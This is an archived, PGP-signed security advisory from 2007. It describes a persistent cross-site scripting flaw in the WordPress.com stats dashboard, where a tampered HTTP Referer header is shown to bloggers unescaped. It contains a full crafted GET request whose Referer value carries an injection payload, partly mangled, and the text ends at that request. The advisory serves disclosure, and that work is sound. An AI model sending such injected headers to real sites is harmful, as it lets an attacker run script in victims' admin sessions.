TUCoPS :: Web :: Blogs :: tb11345.htm

Persistent cross-site scripting in wordpress.com dashboard
Persistent cross-site scripting in wordpress.com dashboard
Persistent cross-site scripting in wordpress.com dashboard



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

1. DESCRIPTION OF THE SOFTWARE

On May 6th, 2007 a new WordPress plugin called "stats" was released.
This plugin allows a WordPress user who has his blog self-hosted to
use the Wordpress.com statistics.
The plugin includes a JavaScript on the blog page to collect
statistics from visitors. This statistics include page viewed, search
engine keywords, if used, and referrer as well.

2. DESCRIPTION OF THE VULNERABILITY

The referrer field is taken from the HTTP header generated by the user
with his browser. So it's a user-input and it is possibile therefore to
tamper with it.
This is a snip of code taken from the stats page of Wordpress.com dashboard.

...
href='http://www.referersite.it/?q=2'>http://www.referersite.it/?q=2 
...

If an attacker creates an HTTP request like this, an alert box will be
displayed when the blogger reads his stats:
GET http://www.somewpblog.com/ HTTP/1.1 
Host:www.siteofblogger.com 
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.3)
Gecko/20070309 Firefox/2.0.0.3
Accept:text/xml,application/xml,application/xhtml+xml,text/html;
q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language:it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding:gzip,deflate
Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:300
Connection:keep-alive
Referer:http://www.e.it'>href=''>http://www.miosito.it'>